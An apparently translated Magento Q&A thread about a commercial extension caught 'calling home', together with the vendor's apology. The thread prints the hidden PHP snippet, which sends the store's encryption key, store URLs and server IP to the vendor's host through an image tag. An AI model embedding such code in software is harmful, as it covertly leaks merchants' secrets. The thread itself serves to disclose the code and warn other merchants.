¿Alguna buena razón para que un módulo acceda a global / crypt / key de forma remota?

19

Perdone mi ignorancia, pero la clave de cifrado se usa para descifrar los datos de Magento, ¿verdad? ¿Hay alguna buena razón para que un módulo acceda a esto? Me encontré con este código después de instalar Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

magento-1.9 TylersSN
fuente
3
ESTA. ES. HORRIBLE. No hay razón para perder su clave de cifrado.
Fabian Blechschmidt
1
Esto es malo, muy malo.
Anna Völkl
1
¡Buena atrapada! Esto es extremadamente malo ...
Sander Mangel
1
Gracias @Sander por contarnos. Se ha eliminado de Connect.
puntos de referencia
1
@benmarks me alegra escuchar eso. Esto es extremadamente decepcionante por las razones obvias, así como porque la aplicación ha sido extremadamente impresionante y el desarrollador ha sido extremadamente útil y rápido en el pasado.
TylersSN

Respuestas:

11

Sí ... hay una buena razón.
Quieren saberlo y registrarlo, por si acaso. :)

Debe desinstalar la extensión (lo más probable es que ya lo haya hecho). Nunca debe usar extensiones que "llamen a casa", sin importar qué datos envíen a casa.

Es posible que desee enumerar la extensión aquí para que otros la vean: Código divertido / inútil / horrible de Magento Extensions

Marius
fuente
1
"llamar a casa", lamentablemente, lo hacen muchos módulos. Amasty y Aheadworks también lo hacen: \
Sander Mangel
44
Este gist.github.com/miguelbalparda/b57a47a010a5995bc44d se puede usar para verificar la clave global / crypt / de CLI en todas las carpetas excelt app / code / core.
mbalparda
Entonces, no solo son capaces de descifrar las contraseñas de datos cc (bueno que no las guardo), etc. Pero pagué $ 300 para que tuvieran esa capacidad. Eso es lo que debería publicarse en Funny.
TylersSN
1
@iUseMagentoNow. Esto es divertido "ooh", no divertido "ja, ja". Debería solicitar la devolución de su dinero.
Marius
8

Recibimos la solicitud de soporte sobre esta característica hoy. Ya lo resolvimos y eliminamos este fragmento de código. Una nueva versión está disponible para todos nuestros clientes en su área de clientes (de forma gratuita, ya que ofrecemos actualizaciones ilimitadas).

Sé que necesitamos justificar esto, así que hagamos eso:

  • El objetivo de este rastreador era SOLO seguir el uso no autorizado de nuestra extensión.
  • El rastreador solo se mostró en el área de administración (ninguno de sus clientes ni nadie más que usted y nosotros hemos podido verlo).
  • También eliminamos esto en nuestra base de datos.
  • La clave es solo cifrar su contraseña de administrador. Como solíamos trabajar con todos ustedes mediante solicitudes de soporte, es posible que ya nos hayan enviado sus credenciales por correo electrónico para solicitar asistencia. Si quisiéramos su contraseña, la enviaríamos directamente ... No era el objetivo.
  • Incluso con la clave, su contraseña todavía está encriptada. Y el administrador de magento bloquea al usuario después de algunos intentos.

Reconocemos que es un error, y esta es la fortaleza de la comunidad y el sistema de código abierto: podemos arreglar y mejorar mucho más rápido. Gracias a todos por habernos alertado, ahora haremos un mayor esfuerzo en la vulnerabilidad.

Administrador de contenido avanzado
fuente
3
¡+1 por tomar el esfuerzo de responder aquí en público en Magento SE!
7ochem
2
¿Uso no autorizado de la extensión? Simplemente puede usar el dominio para eso.
mbalparda